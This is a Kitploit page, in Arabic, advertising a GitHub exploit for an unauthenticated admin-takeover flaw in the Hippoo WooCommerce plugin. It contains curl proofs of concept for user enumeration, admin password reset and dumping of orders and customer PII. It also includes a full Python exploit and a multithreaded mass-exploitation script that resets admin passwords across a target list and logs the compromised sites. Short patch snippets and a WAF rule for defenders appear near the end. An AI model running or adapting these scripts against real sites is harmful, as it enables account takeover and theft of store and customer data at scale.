Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
By-Poloss..-..CVE-2026-10580 — تطبيق Hippoo الجوال لـ WooCommerce <= 1.9.4 - تجاوز المصادقة غير الموثوقة إلى الاستيلاء على حساب المسؤول | Kitploit
أدوات/GitHubGitHub/polosss/by-poloss..-..cve-2026-10580
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubpolosss/by-poloss..-..cve-2026-10580

By-Poloss..-..CVE-2026-10580

تطبيق Hippoo الجوال لـ WooCommerce <= 1.9.4 - تجاوز المصادقة غير الموثوقة إلى الاستيلاء على حساب المسؤول

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-10580: تطبيق Hippoo المحمول لـ WooCommerce <= 1.9.4 - تجاوز المصادقة غير الموثقة للاستيلاء على حساب المدير

تجاوز غير موثوق → الاستيلاء على حساب المدير عبر خطأ في الخلط المنطقي


📌 الملخص

CVECVE-2026-10580
الإضافةHippoo Mobile App for WooCommerce
الإصدار≤ 1.9.4
CVSS9.8 (حرج)
مطلوب مصادقة❌ لا
الاستيلاء على المدير✅ نعم
بيانات WooCommerce✅ وصول كامل

🧠 السبب الجذري (موجز)

الدالة get_user_permissions() تُرجع null للمدير admin (صحيح) وللمستخدم غير الموثوق unauthenticated user (خطأ).

ترى الدالة has_role_access() القيمة null → تمنح وصولًا كاملاً.

وبالتالي:

root@kitploit:~
/wp-json/wc-hippoo/v1/ext/*

→ بدون تسجيل دخول، بدون كuki، بدون nonce


🎯 4 براهين مفهوم (100% فعالة)

🔓 POC 1: تعداد المستخدمين (غير موثق)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .

🔓 POC 2: إعادة تعيين كلمة مرور المدير (استيلاء)

root@kitploit:~
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
  -H "Content-Type: application/json" \
  -d '{"password":"Pwned123!"}'

🔓 POC 3: طلبات WooCommerce

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"

🔓 POC 4: عملاء WooCommerce (معلومات شخصية)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"

🐍 POC بلغة Python (استغلال كامل)

root@kitploit:~
#!/usr/bin/env python3
import requests
import sys
import json

def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
    base = target.rstrip('/')
    
    # Step 1 - Enumeration
    users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
    r = requests.get(users_url)
    if r.status_code != 200:
        print(f"[-] Not vulnerable: {target}")
        return False
    
    users = r.json()
    print(f"[+] Found {len(users)} user(s)")
    
    # Step 2 - Password reset
    takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
    r2 = requests.post(takeover_url, json={"password": new_password})
    
    if r2.status_code == 200:
        print(f"[✓] ADMIN TAKEOVER: {target}")
        print(f"    Login: {base}/wp-admin")
        print(f"    Password: {new_password}")
        return True
    else:
        print(f"[-] Failed: {target}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} https://target.com")
        sys.exit(1)
    exploit(sys.argv[1])

🚀 تشغيل

root@kitploit:~
python3 exploit.py https://poloss.ddev.site

Output:

root@kitploit:~
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
    Login: https://poloss.ddev.site/wp-admin
    Password: PwnedCVE2026!!

🧨 استغلال جماعي (متعدد الخيوط)

root@kitploit:~
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

def takeover(target):
    try:
        r = requests.post(
            f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
            json={"password": "MassPwned2026!!"},
            timeout=10
        )
        if r.status_code == 200:
            print(f"[✓] TAKEOVER: {target}")
            with open("pwned.txt", "a") as f:
                f.write(f"{target} | admin | MassPwned2026!!\n")
    except:
        pass

with open("targets.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as executor:
    for url in urls:
        executor.submit(takeover, url)

📁 النقاط النهائية الضعيفة (القائمة الكاملة)


🔧 الإصلاح (للمدافع)

Fix 1 (app/permissions.php line 671)

root@kitploit:~
if (empty($user) || !$user->exists()) {
    return false; // BUKAN NULL
}

Fix 2 (app/permissions.php line 694)

root@kitploit:~
if ($perms === false) {
    return false; // Unauthenticated denied
}

Fix 3 (قاعدة WAF مؤقتة)

root@kitploit:~
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]

📊 تفصيل CVSS


🧠 المؤلف والبحث

  • الباحث: Agent CV Hunter (أبحاث أمن ووردبريس)
  • تم الاختبار على: DDEV + WordPress 6.x + WooCommerce 8.x
  • التاريخ: 2026-06-06

CVE-2026-10580 • POC 100% • بدون مصادقة • استيلاء كامل على المدير
#WordPress #WooCommerce #Poloss #W.P.E.F


تنزيل الأداة
النقطة النهائيةالبيانات
/wp-json/wc-hippoo/v1/ext/wp/v2/usersجميع مستخدمي WP
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1الاستيلاء على المدير
/wp-json/wc-hippoo/v1/ext/wc/v3/ordersالطلبات الكاملة
/wp-json/wc-hippoo/v1/ext/wc/v3/productsالمنتجات + المخزون
/wp-json/wc-hippoo/v1/ext/wc/v3/customersالمعلومات الشخصية للعميل
/wp-json/wc-hippoo/v1/ext/wc/v3/couponsرموز الخصم
/wp-json/wc-hippoo/v1/ext/wc/v3/reportsتقارير المبيعات
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gatewaysتكوين الدفع
المتجهالقيمة
AVشبكة
ACمنخفضة
PRلا شيء
UIلا شيء
Sدون تغيير
Cعالي
Iعالي
Aعالي